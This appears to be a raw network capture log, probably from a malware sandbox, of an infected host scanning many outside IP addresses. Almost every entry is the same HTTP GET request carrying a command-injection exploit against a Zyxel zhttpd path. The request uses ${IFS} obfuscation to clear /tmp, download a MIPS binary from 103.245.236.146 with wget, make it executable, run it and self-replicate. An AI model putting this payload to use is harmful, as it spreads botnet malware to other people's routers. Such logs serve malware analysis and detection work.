                                                        Jan 28, 2024 10:12:45.274831057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2695192.168.2.144135246.214.99.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274847984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2696192.168.2.1444600177.32.109.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274892092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2697192.168.2.1445856186.35.158.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274944067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2698192.168.2.1450968131.199.31.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.274976015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2699192.168.2.143994819.234.2.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.275007010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2700192.168.2.1435766197.11.47.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.275064945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2701192.168.2.143435682.178.58.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.275074005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2702192.168.2.1444020180.38.232.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.275110960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2703192.168.2.143510036.240.253.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.275146008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2704192.168.2.1438646140.205.96.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.275409937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2705192.168.2.143351623.126.174.748080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.325011015 CET69INHTTP/1.1 414 Request-URI Too Large
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2706192.168.2.1457224182.5.131.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283447027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2707192.168.2.1451280101.182.35.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283480883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2708192.168.2.1455830206.159.133.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283528090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2709192.168.2.143613692.126.139.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283582926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2710192.168.2.1457926139.49.64.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283620119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2711192.168.2.1459786158.54.158.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283658028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2712192.168.2.1452270124.27.59.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283689976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2713192.168.2.145346246.28.225.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283730984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2714192.168.2.1455322191.100.30.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283781052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2715192.168.2.1458086181.41.138.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283819914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2716192.168.2.1433100143.226.97.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283852100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2717192.168.2.144994462.121.1.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283890009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2718192.168.2.144483490.106.153.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283957005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2719192.168.2.143825075.155.155.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.283993959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2720192.168.2.1450696200.197.129.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284032106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2721192.168.2.1446952113.87.95.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284060955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2722192.168.2.144299672.169.62.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284116030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2723192.168.2.1448242114.163.235.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284147024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2724192.168.2.1434686210.9.254.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284194946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2725192.168.2.144880217.39.2.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284243107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2726192.168.2.1449976132.250.3.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284274101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2727192.168.2.143856691.196.129.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284329891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2728192.168.2.1452066172.172.17.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284360886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2729192.168.2.1459498201.217.55.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284415007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2730192.168.2.1459230117.116.99.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284446001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2731192.168.2.1436538128.134.112.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284492016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2732192.168.2.1440694129.122.123.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284537077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2733192.168.2.1448654204.183.200.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284579992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2734192.168.2.1439206216.213.116.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284606934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2735192.168.2.1434560196.40.133.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284662962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2736192.168.2.1457400190.100.196.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284704924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2737192.168.2.144604841.124.94.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284740925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2738192.168.2.145191691.213.201.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284778118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2739192.168.2.1451832204.226.112.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284821987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2740192.168.2.1460902136.55.208.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284857035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2741192.168.2.144650248.225.188.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284889936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2742192.168.2.1436842178.35.192.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284910917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2743192.168.2.1437082218.224.134.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284954071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2744192.168.2.145793619.177.50.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.284996033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2745192.168.2.145170431.16.89.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285021067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2746192.168.2.145591085.218.99.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285075903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2747192.168.2.1455850176.50.233.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285119057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2748192.168.2.143629469.6.68.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285176039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2749192.168.2.1451458123.146.160.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285222054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2750192.168.2.1458218112.231.126.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285259962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2751192.168.2.144509874.174.237.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285329103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2752192.168.2.1459116104.2.219.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285351992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2753192.168.2.1439418140.4.86.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285383940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2754192.168.2.1448468184.188.18.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285429955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2755192.168.2.145657612.198.130.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.285460949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2756192.168.2.144696224.122.152.57443
                                                        TimestampBytes transferredDirectionData
